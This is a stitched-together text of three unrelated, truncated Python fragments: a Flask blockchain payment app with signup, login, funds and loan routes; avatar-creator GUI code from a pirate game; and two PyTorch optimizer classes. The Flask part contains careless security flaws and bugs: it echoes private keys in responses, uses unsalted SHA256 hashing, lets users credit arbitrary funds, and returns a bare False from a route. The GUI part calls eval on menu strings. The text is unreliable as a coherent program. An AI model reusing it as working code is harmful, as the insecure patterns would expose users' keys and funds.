keys = Keys.query.all()
return render_template('admin.html', keys = keys)
@app.route('/genesis', methods = ['GET', 'POST'])
def genesis():
block = Blockchain(desc_transfer = "This is Genesis Block", prev_hash = '0c08c0d223af7f43cbf3543b4a3559cd0cc0b37893c38a2fc8319e204e80c2c2', sender_id = 'genesis', reciver_id = 'genesis', transaction_amt = float(1000), new_hash = '5957b313c1653a9fdf97e25373bd7641a456e4d75789110c7092a71a03a67c33', addres_key_miner = 'genesis', nonce = 1 )
db.session.add(block)
db.session.commit()
return jsonify({'Succesfull': 'genesis block added '})
@app.route('/checkblockchain', methods = ['GET', 'POST'])
def checkblockchain():
blocks = Blockchain.query.all()
for i in blocks:
prev_hash_check, new_hash_check, nonce = mining.checkchain(i)
if not (i.prev_hash == prev_hash_check and i.new_hash == new_hash_check and i.nonce == nonce):
return False
return jsonify({'Yay': 'All the blocks are valid! Thansk For chechking!'})
@app.route('/signup', methods = ['GET', 'POST'])
def signup():
if request.method == 'POST':
name = request.form.get('name')
dob = request.form.get('dob')
miner_status = request.form.get('miner_status')
pan_no = request.form.get('pan_no')
mobile_no = request.form.get('mobile_no')
blockkey = Keys.query.all()[0]
addres_key, private_key = blockkey.addres_key, blockkey.private_key
if miner_status == 'Yes':
temp_priv = mining.SHA256(blockkey.private_key)
new_user = User(name = name, dob = dob, miner_status = True, addres_key = addres_key, private_key = temp_priv, pan_no = pan_no, mobile_no = mobile_no)
elif miner_status == 'No':
temp_priv = mining.SHA256(blockkey.private_key)
new_user = User(name = name, dob = dob, miner_status = False, addres_key = addres_key, private_key = temp_priv, pan_no = pan_no, mobile_no = mobile_no)
block_remove = Keys.query.get_or_404(blockkey.id)
db.session.delete(block_remove)
db.session.add(new_user)
db.session.commit()
return jsonify({'Keep Your details safe:':'We provide you with this msg so that u can safely store ur private key',
'Caution': 'We do not know ur private key it is hashed and stored in databse pls keep it safe',
'name': name,
'dob': dob,
'miner_status': miner_status,
'addres_key': addres_key,
'private_key': private_key,
'pan_no': pan_no,
'mobile_no': mobile_no,})
return render_template('login.html')
@app.route('/login', methods = ['GET', 'POST'])
def login():
if request.method == 'POST':
name = request.form.get('name')
private_key = request.form.get('private_key')
pos_users = User.query.filter_by(name = name)
private_key = mining.SHA256(private_key)
for i in pos_users:
if i.name == name and i.private_key == private_key:
user = User.query.get(i.id)
load_user(user.id)
login_user(user)
return redirect('http://127.0.0.1:3000/')
return redirect('http://127.0.0.1:3000/')
# return render_template('login.html')
@app.route('/signout', methods = ['GET', 'POST'])
@login_required
def signout():
logout_user()
return redirect(url_for('login'))
@app.route('/makepayment', methods = ['GET', 'POST'])
@login_required
def makepayment():
if request.method == 'POST':
amount = request.form.get('amount')
addres_key = request.form.get('addres_key')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if current_user.private_key == private_key and current_user.current_balance >= float(amount):
if current_user.addres_key == addres_key:
return jsonify({'error': 'You cant send money to yourself'})
if float(amount) <= 0:
return jsonify({'error': 'amount cant be negative'})
block_waiting = Blockchain_Waiting(desc_transfer = 'User Transaction', sender_id = private_key, reciver_id = addres_key, transaction_amt = float(amount))
db.session.add(block_waiting)
db.session.commit()
return redirect('http://127.0.0.1:3000/')
return redirect('http://127.0.0.1:3000/')
@app.route('/addfunds', methods = ['GET', 'POST'])
@login_required
def addfunds():
if request.method == 'POST':
amount = request.form.get('amount')
amount_inr = request.form.get('amount_inr')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if current_user.private_key == private_key:
current_user.current_balance = current_user.current_balance + float(amount)
admin_acc = User.query.filter_by(addres_key = addres_key_admin)[0]
admin_acc.current_balance -= float(amount)
coin = CoinManager.query.all()[0]
coin.total_given += float(amount)
coin.total_money_in_network += float(amount_inr)
db.session.commit()
return redirect(url_for('makepayment'))
else:
return jsonify({'error':'enter correct privatekey'})
return render_template('index.html')
@app.route('/sellfunds', methods = ['GET', 'POST'])
@login_required
def sellfunds():
if request.method == 'POST':
amount = request.form.get('amount')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if float(amount) >= (current_user.current_balance)*0.5:
return jsonify({'error':'Exceding the transaction limit'})
if current_user.private_key == private_key:
current_user.current_balance -= float(amount)
admin_acc = User.query.filter_by(addres_key = addres_key_admin)[0]
admin_acc.current_balance += float(amount)
db.session.commit()
return jsonify({'yay':'You Succesfull sold the coins!'})
else:
return jsonify({'error':'Enter correct Private Key'})
return render_template('index.html')
@app.route('/getloan', methods = ['GET', 'POST'])
@login_required
def getloan():
if request.method == 'POST':
amount = request.form.get('amount')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if current_user.current_balance <= float(amount):
return jsonify({'error':'We cant provide u loan more than your worth!'})
if (current_user.current_balance)*0.5 >= float(amount):
current_user.current_balance += float(amount)
current_user.loan_status = True
current_user.loan_taken += float(amount)
admin_acc = User.query.filter_by(addres_key = addres_key_admin)[0]
admin_acc.current_balance -= float(amount)
loan_status = LoanStats(addres_key = current_user.addres_key, amt_on_loan = float(amount))
db.session.add(loan_status)
db.session.commit()
return jsonify({'Yay':'Loan was successfully granted',
'Amount': amount})
else:
return jsonify({'error':'U are not eligible for loan'})
return render_template('loan.html')
@app.route('/payloan', methods = ['GET', 'POST'])
@login_required
def payloan():
if request.method == 'POST':
amount = request.form.get('amount')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if float(amount) and current_user.private_key == private_key:
current_user.current_balance -= float(amount)
current_user.loan_status = True
current_user.loan_taken | |
self.avatarType == AVATAR_PIRATE:
if self.shop == BODYSHOP:
self.makeRandomBody()
elif self.shop == HEADSHOP:
self.makeRandomHead()
elif self.shop == MOUTHSHOP:
self.makeRandomMouth()
elif self.shop == EYESSHOP:
self.makeRandomEyes()
elif self.shop == NOSESHOP:
self.makeRandomNose()
elif self.shop == EARSHOP:
self.makeRandomEar()
elif self.shop == HAIRSHOP:
self.makeRandomHair()
elif self.shop == CLOTHESSHOP:
self.makeRandomClothing()
elif self.shop == NAMESHOP:
self.makeRandomName()
elif self.avatarType == AVATAR_SKELETON:
self.NPCGui.randomPick()
elif self.avatarType == AVATAR_NAVY:
if self.shop == BODYSHOP:
self.makeRandomBody()
self.makeRandomHead()
self.makeRandomHair()
elif self.shop == HEADSHOP:
self.makeRandomHead()
elif self.shop == HAIRSHOP:
self.makeRandomHair()
def handleReset(self):
if self.avatarType == AVATAR_PIRATE:
if self.shop == BODYSHOP:
if self.pirate.style.gender == 'm':
self.resetGender(0)
else:
self.resetGender(1)
self.resetBody()
elif self.shop == HEADSHOP:
self.resetHead()
elif self.shop == MOUTHSHOP:
self.resetMouth()
elif self.shop == EYESSHOP:
self.resetEyes()
elif self.shop == NOSESHOP:
self.resetNose()
elif self.shop == EARSHOP:
self.resetEar()
elif self.shop == HAIRSHOP:
self.resetHair()
elif self.shop == CLOTHESSHOP:
self.resetClothing()
elif self.shop == NAMESHOP:
self.resetName()
elif self.shop == TATTOOSHOP:
self.resetTattoo()
elif self.shop == JEWELRYSHOP:
self.resetJewelry()
elif self.avatarType == AVATAR_SKELETON:
self.NPCGui.reset()
elif self.avatarType == AVATAR_NAVY:
if self.shop == BODYSHOP:
self.resetBody()
self.resetHead()
self.resetHair()
elif self.shop == HEADSHOP:
self.resetHead()
elif self.shop == HAIRSHOP:
self.resetHair()
def addPage(self, pageName = 'Page'):
self.addPageTab(pageName)
def addPageTab(self, pageName = 'Page'):
tabIndex = len(self.pageTabs)
def goToPage():
self.setPage(pageName)
yOffset = 0.69499999999999995 - 0.32500000000000001 * len(self.pageTabs)
tabText = pageName
icon = '**/' + MakeAPiratePageIcons[pageName]
icon_down = '**/' + MakeAPiratePageIcons[pageName] + '_over'
icon_over = '**/' + MakeAPiratePageIcons[pageName] + '_over'
pageTab = DirectButton(parent = self.bookModel, relief = None, image = (self.charGui.find('**/chargui_frame02'), self.charGui.find('**/chargui_frame02_down'), self.charGui.find('**/chargui_frame02_over')), geom = (self.charGui.find(icon), self.charGui.find(icon_down), self.charGui.find(icon_over)), pos = (-1.4750000000000001, 0, yOffset), scale = 0.87, command = goToPage)
self.pageNames.append(pageName)
self.pageTabs.append(pageTab)
def setPage(self, pageName):
nextPageIndex = self.pageNames.index(pageName)
if self.currPageIndex is not None:
if self.currPageIndex == nextPageIndex:
return None
messenger.send(ShopNames[self.currPageIndex] + '-done')
self.pgsRotate.setValue(0)
self.currPageIndex = self.pageNames.index(pageName)
self.setPageTabIndex(self.currPageIndex)
self.request(ShopNames[self.currPageIndex])
def setPageTabIndex(self, pageTabIndex):
if self.currPageTabIndex is not None and pageTabIndex != self.currPageTabIndex:
self.pageTabs[self.currPageTabIndex].clearColorScale()
self.currPageTabIndex = pageTabIndex
self.pageTabs[self.currPageTabIndex].setColorScale(1, 1, 0.5, 1)
def showPageTabs(self):
for i in range(0, len(self.pageTabs)):
self.pageTabs[i].show()
def hidePageTabs(self):
if self.currPageTabIndex == BODYSHOP:
self.exitBodyShop()
elif self.currPageTabIndex == HEADSHOP:
self.exitHeadShop()
elif self.currPageTabIndex == MOUTHSHOP:
self.exitMouthShop()
elif self.currPageTabIndex == EYESSHOP:
self.exitEyesShop()
elif self.currPageTabIndex == NOSESHOP:
self.exitNoseShop()
elif self.currPageTabIndex == EARSHOP:
self.exitEarShop()
elif self.currPageTabIndex == HAIRSHOP:
self.exitHairShop()
elif self.currPageTabIndex == CLOTHESSHOP:
self.exitClothesShop()
elif self.currPageTabIndex == NAMESHOP:
self.exitNameShop()
elif self.currPageTabIndex == TATTOOSHOP:
self.exitTattoosShop()
elif self.currPageTabIndex == JEWELRYSHOP:
self.exitJewelryShop()
for i in range(0, len(self.pageTabs)):
self.pageTabs[i].hide()
def handleRandomAll(self):
self.overwriteCurrentUndo()
self.inRandomAll = True
if self.avatarType == AVATAR_PIRATE:
count = self.currPageIndex + 1
page = self.currPageIndex
self.setPage(PLocalizer.MakeAPiratePageNames[0])
self.makeRandomBody()
self.setPage(PLocalizer.MakeAPiratePageNames[1])
self.makeRandomHead()
self.setPage(PLocalizer.MakeAPiratePageNames[2])
self.makeRandomMouth()
self.setPage(PLocalizer.MakeAPiratePageNames[3])
self.makeRandomEyes()
self.setPage(PLocalizer.MakeAPiratePageNames[4])
self.makeRandomNose()
self.setPage(PLocalizer.MakeAPiratePageNames[5])
self.makeRandomEar()
self.setPage(PLocalizer.MakeAPiratePageNames[6])
self.makeRandomHair()
self.setPage(PLocalizer.MakeAPiratePageNames[7])
self.makeRandomClothing()
self.setPage(PLocalizer.MakeAPiratePageNames[8])
self.makeRandomName()
self.setPage(PLocalizer.MakeAPiratePageNames[page])
idx = 0
if self.pirate.gender == 'f':
idx = 1
optionsLeft = len(self.JSD_ANYTIME[idx])
if optionsLeft and random.choice([
0,
1,
2,
3]) == 1:
if self.lastDialog:
self.lastDialog.stop()
choice = random.choice(range(0, optionsLeft))
dialog = self.JSD_ANYTIME[idx][choice]
base.playSfx(dialog)
self.lastDialog = dialog
self.JSD_ANYTIME[idx].remove(dialog)
elif self.avatarType == AVATAR_SKELETON:
self.NPCGui.randomPick()
elif self.avatarType == AVATAR_NAVY:
if self.shop == BODYSHOP:
self.makeRandomBody()
self.makeRandomHead()
self.makeRandomHair()
elif self.shop == HEADSHOP:
self.makeRandomHead()
elif self.shop == HAIRSHOP:
self.makeRandomHair()
self.inRandomAll = False
self.appendUndo()
self.undoLevel[self.pirate.style.gender] = len(self.undoList[self.pirate.style.gender]) - 1
def handleQuarterView(self, extraArgs):
hpr = self.pirate.getHpr()
if extraArgs != None:
hCam = self.pirate.getH(camera)
rotX = hpr[0]
fudge = self.initH
if self.isNPCEditor:
fudge = 0
if hCam < 0:
if hCam >= -180:
rotX = fudge + 45
elif hCam <= 180:
rotX = fudge - 45
self.pirate.setHpr(rotX, hpr[1], hpr[2])
else:
self.pirate.setHpr(self.lastRot, hpr[1], hpr[2])
def enableRandom(self):
self.guiRandomButton['state'] = 'normal'
self.guiRandomButton.setColorScale(Vec4(1, 1, 1, 1))
def disableRandom(self):
self.guiRandomButton['state'] = 'disabled'
self.guiRandomButton.setColorScale(Vec4(0.29999999999999999, 0.29999999999999999, 0.29999999999999999, 1))
def storeUndo(self):
gender = self.pirate.style.gender
self.bodyGui.save()
self.headGui.save()
self.clothesGui.save()
self.hairGui.save()
self.undoList[gender] = self.undoList[gender][:self.undoLevel[gender] + 1]
self.undoClothing[gender] = self.undoClothing[gender][:self.undoLevel[gender] + 1]
self.undoLevel[gender] += 1
h = HumanDNA.HumanDNA()
h.copy(self.pirate.style)
self.undoList[gender].append(h)
self.undoClothing[gender].append(copy.copy(self.pirate.model.currentClothing))
def undo(self):
self.boundUndo()
def redo(self):
self.boundRedo()
def overwriteCurrentUndo(self):
gender = self.pirate.style.gender
self.bodyGui.save()
self.headGui.save()
self.clothesGui.save()
self.hairGui.save()
h = HumanDNA.HumanDNA()
h.copy(self.pirate.style)
self.undoList[gender][self.undoLevel[gender]] = h
self.undoClothing[gender][self.undoLevel[gender]] = copy.copy(self.pirate.model.currentClothing)
def appendUndo(self):
gender = self.pirate.style.gender
self.bodyGui.save()
self.headGui.save()
self.clothesGui.save()
self.hairGui.save()
h = HumanDNA.HumanDNA()
h.copy(self.pirate.style)
self.undoList[gender].append(h)
self.undoClothing[gender].append(copy.copy(self.pirate.model.currentClothing))
self.prevShuffleButton['state'] = DGG.NORMAL
if self.undoLevel[gender] == len(self.undoList[gender]) - 1:
self.nextShuffleButton['state'] = DGG.DISABLED
def boundUndo(self):
gender = self.pirate.style.gender
listLen = len(self.undoList[gender])
self.overwriteCurrentUndo()
self.pirate.style.copy(self.undoList[gender][self.undoLevel[gender] - 1])
self.pirate.model.currentClothing = self.undoClothing[gender][self.undoLevel[gender] - 1]
self.undoLevel[gender] -= 1
self.refresh()
if self.undoLevel[gender] == 0:
self.prevShuffleButton['state'] = DGG.DISABLED
if self.undoLevel[gender] < len(self.undoList[gender]) - 1:
self.nextShuffleButton['state'] = DGG.NORMAL
def boundRedo(self):
gender = self.pirate.style.gender
listLen = len(self.undoList[gender])
self.overwriteCurrentUndo()
if self.undoLevel[gender] < listLen - 1:
self.pirate.style = HumanDNA.HumanDNA()
self.pirate.style.copy(self.undoList[gender][self.undoLevel[gender] + 1])
self.pirate.style = self.pirate.style
self.pirate.model.currentClothing = self.undoClothing[gender][self.undoLevel[gender] + 1]
self.undoLevel[gender] += 1
self.refresh()
if self.undoLevel[gender] == len(self.undoList[gender]) - 1:
self.nextShuffleButton['state'] = DGG.DISABLED
if self.undoLevel[gender] > 0:
self.prevShuffleButton['state'] = DGG.NORMAL
def refreshShuffleButtons(self):
gender = self.pirate.style.gender
listLen = len(self.undoList[gender])
self.prevShuffleButton['state'] = DGG.DISABLED
self.nextShuffleButton['state'] = DGG.DISABLED
if self.undoLevel[gender] < listLen - 1:
self.nextShuffleButton['state'] = DGG.NORMAL
if self.undoLevel[gender] > 0:
self.prevShuffleButton['state'] = DGG.NORMAL
def receivedRelease(self, pgs, extraStuff):
if self.guiIdStates[pgs.guiId] != pgs['value']:
self.guiIdStates[pgs.guiId] = pgs['value']
if not self.compositeAction:
self.storeUndo()
def receivedAdjust(self, pgs):
self.guiIdStates[pgs.guiId] = 1
def trackSliderElement(self, element):
guiId = element.guiId
thumbId = element.thumb.guiId
self.guiIdStates[guiId] = element['value']
self.accept('release-mouse1-%s' % guiId, self.receivedRelease, extraArgs = [
element])
self.accept('release-mouse1-%s' % thumbId, self.receivedRelease, extraArgs = [
element])
def startCompositeAction(self):
self.compositeAction = 1
def endCompositeAction(self):
self.compositeAction = 0
self.storeUndo()
def refresh(self, needToRefresh = True, wantClothingChange = False):
currentClothing = self.pirate.model.currentClothing
self.pirate.setDNA(self.pirate.style)
self.pirate.generateHuman(self.pirate.style.gender)
self.pirate.model.currentClothing = currentClothing
if self.isNPCEditor or self.wantNPCViewer:
self.pirate.disableBlend()
self.pirate.model.setupSelectionChoices('NPC')
else:
self.pirate.model.setupSelectionChoices('DEFAULT')
self.placePirate(wantClothingChange)
self.bodyGui.restore(needToRefresh)
self.headGui.restore()
self.clothesGui.restore()
def playJackDialogOnClothes(self, clothesType):
if self.inRandomAll:
return None
choice = random.choice(range(12))
if choice != 0:
return None
optionsLeft = len(self.JSD_CLOTHING[self.pirate.gender][clothesType])
if optionsLeft:
if self.lastDialog:
if self.lastDialog.status() == AudioSound.PLAYING:
return None
choice = random.choice(range(0, optionsLeft))
dialog = self.JSD_CLOTHING[self.pirate.gender][clothesType][choice]
base.playSfx(dialog)
self.lastDialog = dialog
self.JSD_CLOTHING[self.pirate.gender][clothesType].remove(dialog)
def refreshAnim(self, needToRefresh = True):
if needToRefresh:
self.handleSetAnim(AnimList[self.lastAnim], needToRefresh = False)
else:
self.pirate.loop(AnimList[self.lastAnim])
def marketingOn(self):
if self.entered and self.wantMarketingViewer:
self.guiTopBar.show()
self.PirateButton.hide()
self.NPCButton.hide()
self.NavyButton.hide()
def marketingOff(self):
if self.entered and self.wantMarketingViewer:
self.guiTopBar.hide()
def toggleGUI(self):
render2d.toggleVis()
self.pirate.findAllMatches('**/drop*').getPath(1).toggleVis()
def updateFilter(self, arg = None):
if self.isNPCEditor or self.wantNPCViewer:
avatarType = 'NPC'
else:
avatarType = 'DEFAULT'
versionFilterStr = self.filterVersionMenu.get()
if versionFilterStr == 'All':
versionFilter = None
else:
versionFilter = eval('ItemGlobals.' + versionFilterStr)
rarityFilterStr = self.filterRarityMenu.get()
if rarityFilterStr == 'All':
rarityFilter = None
else:
rarityFilter = eval('ItemGlobals.' + rarityFilterStr)
isFromLoot = self.filterUsageLootButton['relief'] == DGG.SUNKEN
if arg == 'Loot':
isFromLoot = not isFromLoot
self.filterUsageLootButton['relief'] = abs(self.filterUsageLootButton['relief'] - 3) + 2
isFromShop = self.filterUsageShopButton['relief'] == DGG.SUNKEN
if arg == 'Shop':
isFromShop = not isFromShop
self.filterUsageShopButton['relief'] = abs(self.filterUsageShopButton['relief'] - 3) + 2
isFromQuest = self.filterUsageQuestButton['relief'] == DGG.SUNKEN
if arg == 'Quest':
isFromQuest = not isFromQuest
self.filterUsageQuestButton['relief'] = abs(self.filterUsageQuestButton['relief'] - 3) + 2
isFromPromo = self.filterUsagePromoButton['relief'] == DGG.SUNKEN
if arg == 'Promo':
isFromPromo = not isFromPromo
self.filterUsagePromoButton['relief'] = abs(self.filterUsagePromoButton['relief'] - 3) + 2
isFromPVP = self.filterUsagePvpButton['relief'] == DGG.SUNKEN
if arg == 'Pvp':
isFromPVP = not isFromPVP
self.filterUsagePvpButton['relief'] = abs(self.filterUsagePvpButton['relief'] - 3) + 2
isFromNPC = self.filterUsageNpcButton['relief'] == DGG.SUNKEN
if arg == 'Npc':
isFromNPC = not isFromNPC
self.filterUsageNpcButton['relief'] = abs(self.filterUsageNpcButton['relief'] - 3) + 2
holidayFilterStr = self.filterHolidayMenu.get()
if holidayFilterStr == 'All':
holidayFilter = None
else:
holidayFilter = CATALOG_HOLIDAYS[holidayFilterStr]
self.clothesGui.avatar.setupSelectionChoices(avatarType, versionFilter, rarityFilter, isFromLoot, isFromShop, isFromQuest, isFromPromo, isFromPVP, isFromNPC, holidayFilter)
self.clothesGui.checkCurrentClothing()
def printFilteredChoices(self):
avatar = self.clothesGui.avatar
versionFilterStr = self.filterVersionMenu.get()
rarityFilterStr = self.filterRarityMenu.get()
holidayFilterStr = self.filterHolidayMenu.get()
isFromLoot = self.filterUsageLootButton['relief'] == DGG.SUNKEN
isFromShop = self.filterUsageShopButton['relief'] == DGG.SUNKEN
isFromQuest = self.filterUsageQuestButton['relief'] == DGG.SUNKEN
isFromPromo = self.filterUsagePromoButton['relief'] == DGG.SUNKEN
isFromPVP = self.filterUsagePvpButton['relief'] == DGG.SUNKEN
isFromNPC = self.filterUsageNpcButton['relief'] == DGG.SUNKEN
result = 'Version:%s Rarity:%s Loot:%s Shop:%s Quest:%s Promo:%s PVP:%s NPC:%s Holiday:%s' % (versionFilterStr, rarityFilterStr, isFromLoot, isFromShop, isFromQuest, isFromPromo, isFromPVP, isFromNPC, holidayFilterStr)
for clothesType in [
'HAT',
'SHIRT',
'VEST',
'COAT',
'BELT',
'PANT',
'SHOE']:
result += '\n\n%s\n' % clothesType
for itemId in avatar.choices[clothesType].keys():
if itemId == 0:
continue
modelId = avatar.choices[clothesType][itemId][0]
textureId = avatar.choices[clothesType][itemId][1]
textureName = avatar.getTextureName(clothesType, modelId, textureId)
if textureName is not None:
result += | |
super(HyperRangerMod, self).__init__(params, defaults)
def __setstate__(self, state):
super(HyperRangerMod, self).__setstate__(state)
def step(self, display=False, activate_IA=False, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError(
'HyperRangerMod does not support sparse gradients')
state = self.state[p]
hypergrad_lr = group['hypergrad_lr']
beta1_init, beta2, beta3 = group['betas']
nu1, nu2 = group['nus']
wd = group['weight_decay']
alpha = group['alpha']
gamma = group['gamma']
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
if self.use_diffgrad:
state['previous_grad'] = torch.zeros_like(p.data)
state['lr'] = group['lr']
if self.IA:
state['num_models'] = 0
if self.IA or self.k > 0:
state['cached_params'] = p.data.clone()
if beta3 > 0.0:
state['n_avg'] = torch.zeros_like(p.data)
if self.nostalgia:
state['B_old'] = 0
state['B_new'] = 1
if hypergrad_lr > 0.0:
state['cached_hypergrad_comp'] = torch.zeros_like(
grad.view(-1))
state['step'] += 1
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if self.use_demon:
temp = 1 - (state['step'] / self.T)
beta1 = beta1_init * temp / \
((1 - beta1_init) + beta1_init * temp)
else:
beta1 = beta1_init
if self.nostalgia:
beta2 = state['B_old'] / state['B_new']
state['B_old'] += math.pow(state['step'], -gamma)
state['B_new'] += math.pow(state['step'] + 1, -gamma)
do_IA = False
lookahead_step = False
if self.IA and activate_IA:
lookahead_step = False
if state['step'] % self.IA_cycle == 0:
do_IA = True
elif self.k == 0:
lookahead_step = False
else:
if state['step'] % self.k == 0:
lookahead_step = True
else:
lookahead_step = False
if state['step'] > 1 and hypergrad_lr > 0.0:
du = state['cached_hypergrad_comp']
h = torch.dot(grad.view(-1), du)
state['lr'] -= hypergrad_lr * h
torch.max(state['lr'], torch.zeros_like(
state['lr']), out=state['lr'])
if display:
print(state['lr'])
if self.use_gc and grad.dim() > 1:
grad.add_(-grad.mean(dim=tuple(range(1, grad.dim())), keepdim=True))
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
exp_avg.mul_(beta1).add_(1 - beta1, grad)
if self.use_diffgrad:
previous_grad = state['previous_grad']
diff = abs(previous_grad - grad)
dfc = 1. / (1. + torch.exp(-diff))
state['previous_grad'] = grad.clone()
exp_avg = exp_avg * dfc
momentum = exp_avg.clone()
momentum.div_(
1 - (beta1 ** state['step'])).mul_(nu1).add_(1 - nu1, grad)
vt = exp_avg_sq.clone()
if not self.nostalgia:
vt.div_(1 - (beta2 ** state['step']))
if nu2 != 1.0:
vt.mul_(nu2).addcmul_(1 - nu2, grad, grad)
if group['p'] != 1.0:
denom = vt.pow_(group['p']).add_(group['eps'])
else:
denom = vt
n = state['lr'] / denom
if beta3 > 0.0: # apply AdaMod
n_avg = state['n_avg']
n_avg.mul_(beta3).add_(1 - beta3, n)
if self.AdaMod_bias_correct:
n_avg_ = n_avg.clone()
bias_correction3 = 1 - (beta3 ** state['step'])
n_avg_.div_(bias_correction3)
torch.min(n, n_avg_, out=n)
else:
torch.min(n, n_avg, out=n)
if group['dropout'] > 0.0:
mask = torch.bernoulli(
torch.ones_like(p.data) - group['dropout'])
n = n * mask
p.data.add_(-n * momentum)
if lookahead_step:
dalpha = alpha
elif do_IA:
dalpha = (1 / (state["num_models"] + 1.0))
else:
dalpha = 1.0
if hypergrad_lr > 0.0:
if beta3 > 0.0:
grad_from_n = dalpha * \
(-(momentum / denom) - wd * p.data)
if self.AdaMod_bias_correct:
grad_from_n_avg_ = dalpha * \
(-((1 - beta3) / bias_correction3)
* (momentum / denom) - wd * p.data)
du = torch.where(n_avg_ < n,
grad_from_n_avg_,
grad_from_n)
else:
grad_from_n_avg = dalpha * \
(-(1 - beta3) * (momentum / denom) - wd * p.data)
du = torch.where(n_avg < n,
grad_from_n_avg,
grad_from_n)
else:
du = dalpha * (-(momentum / denom) - wd * p.data)
state['cached_hypergrad_comp'] = du.view(-1)
if wd != 0:
p.data.add_(-wd * state['lr'], p.data)
if lookahead_step:
p.data.mul_(alpha).add_(
1.0 - alpha, state['cached_params'])
state['cached_params'].copy_(p.data)
if do_IA:
p.data.add_(state["num_models"], state['cached_params']
).div_(state["num_models"] + 1.0)
state['cached_params'].copy_(p.data)
state["num_models"] += 1
return loss
class HDQHSGDW(Optimizer):
def __init__(self, params, lr=1e-3,
beta=0.999,
nu=0.7,
hypergrad_lr=1e-3,
HDM=False,
k=5,
alpha=0.5,
eps=1e-8,
weight_decay=0,
use_gc=True,
use_diffgrad=False):
# BASIC SGD + Momentum but with QHMomentum and Hypergradient descent over all beta, lr, and nu + Lookahead and decorrelated weight decay
# they say the best of them all is still SGD + Momentum?
# use_diffgrad = bool to determine whether to use diffgrad or not.
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= hypergrad_lr:
raise ValueError(
"Invalid hypergradient learning rate: {}".format(hypergrad_lr))
if not 0.0 <= beta < 1.0:
raise ValueError("Invalid beta parameter: {}".format(beta))
if not 0.0 <= nu <= 1.0:
raise ValueError("Invalid nu parameter: {}".format(nu))
if not 0.0 <= alpha < 1.0:
raise ValueError("Invalid alpha parameter: {}".format(alpha))
self.k = k
self.use_gc = use_gc
self.use_diffgrad = use_diffgrad
self.HDM = HDM
defaults = dict(lr=lr,
beta=beta,
nu=nu,
alpha=alpha,
hypergrad_lr=hypergrad_lr,
eps=eps,
weight_decay=weight_decay)
super(HDQHSGDW, self).__init__(params, defaults)
def __setstate__(self, state):
super(HDQHSGDW, self).__setstate__(state)
def hyperupdate(self, update, grad, grad_comp, hypergrad_lr, eps):
h = torch.dot(grad.view(-1), grad_comp)
if self.HDM:
grad_norm = grad.view(-1).norm()
norm_denom = grad_norm * (grad_comp.norm())
norm_denom.add_(eps)
update = update * (1 - hypergrad_lr * (h / norm_denom))
else:
update -= hypergrad_lr * h
return update
def step(self, display=False, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError(
'HDQHSGDW does not support sparse gradients')
state = self.state[p]
hypergrad_lr = group['hypergrad_lr']
wd = group['weight_decay']
alpha = group['alpha']
if len(state) == 0:
state['step'] = 0
state['lr'] = group['lr']
state['nu'] = group['nu']
state['beta'] = group['beta']
state['exp_avg'] = torch.zeros_like(p.data)
if self.use_diffgrad:
state['previous_grad'] = torch.zeros_like(p.data)
if self.k > 0:
state['cached_params'] = p.data.clone()
if hypergrad_lr > 0.0:
state['prev_lr_grad'] = torch.zeros_like(grad.view(-1))
state['prev_nu_grad'] = torch.zeros_like(grad.view(-1))
state['prev_beta_grad'] = torch.zeros_like(
grad.view(-1))
state['step'] += 1
exp_avg = state['exp_avg']
if self.use_diffgrad:
previous_grad = state['previous_grad']
diff = abs(previous_grad - grad)
dfc = 1. / (1. + torch.exp(-diff))
state['previous_grad'] = grad.clone()
exp_avg = exp_avg * dfc
lookahead_step = False
if self.k == 0:
lookahead_step = False
else:
if state['step'] % self.k == 0:
lookahead_step = True
else:
lookahead_step = False
if state['step'] > 1 and hypergrad_lr > 0.0:
prev_lr_grad = state['prev_lr_grad']
prev_beta_grad = state['prev_beta_grad']
prev_nu_grad = state['prev_nu_grad']
state['lr'] = self.hyperupdate(update=state['lr'],
grad=grad,
grad_comp=prev_lr_grad,
hypergrad_lr=hypergrad_lr,
eps=group['eps'])
torch.max(state['lr'], torch.zeros_like(
state['lr']), out=state['lr'])
if display:
print("lr", state['lr'])
state['beta'] = self.hyperupdate(update=state['beta'],
grad=grad,
grad_comp=prev_beta_grad,
hypergrad_lr=hypergrad_lr,
eps=group['eps'])
torch.max(state['beta'], torch.zeros_like(
state['beta']), out=state['beta'])
torch.min(state['beta'], torch.ones_like(
state['beta']), out=state['beta'])
if display:
print("beta", group['beta'])
state['nu'] = self.hyperupdate(update=state['nu'],
grad=grad,
grad_comp=prev_beta_grad,
hypergrad_lr=hypergrad_lr,
eps=group['eps'])
torch.max(state['nu'], torch.zeros_like(
state['nu']), out=state['nu'])
torch.min(state['nu'], torch.ones_like(
state['nu']), out=state['nu'])
if display:
print("nu", state['nu'])
if self.use_gc and grad.dim() > 1:
grad.add_(-grad.mean(dim=tuple(range(1, grad.dim())), keepdim=True))
nu = state['nu']
beta = state['beta']
lr = state['lr']
if lookahead_step:
dalpha = alpha
else:
dalpha = 1.0
gx = 1 - (beta ** state['step'])
fx = beta * exp_avg + (1 - beta) * grad
if hypergrad_lr > 0.0:
dfx = exp_avg - grad
dgx = - state['step'] * beta**(state['step'] - 1)
dbeta = (gx * dfx + fx * dgx) / \
(math.pow(gx, 2) + group['eps'])
dbeta = - dalpha * lr * nu * dbeta
state['prev_beta_grad'] = dbeta.view(-1)
momentum = fx / gx
group['exp_avg'] = fx
if hypergrad_lr > 0.0:
state['prev_nu_grad'] = (-dalpha *
lr * (momentum - grad)).view(-1)
# quasi hyperbolic momentum
momentum.mul_(nu).add_(1 - nu, grad)
if hypergrad_lr > 0.0:
temp = dalpha * (-momentum - wd * p.data)
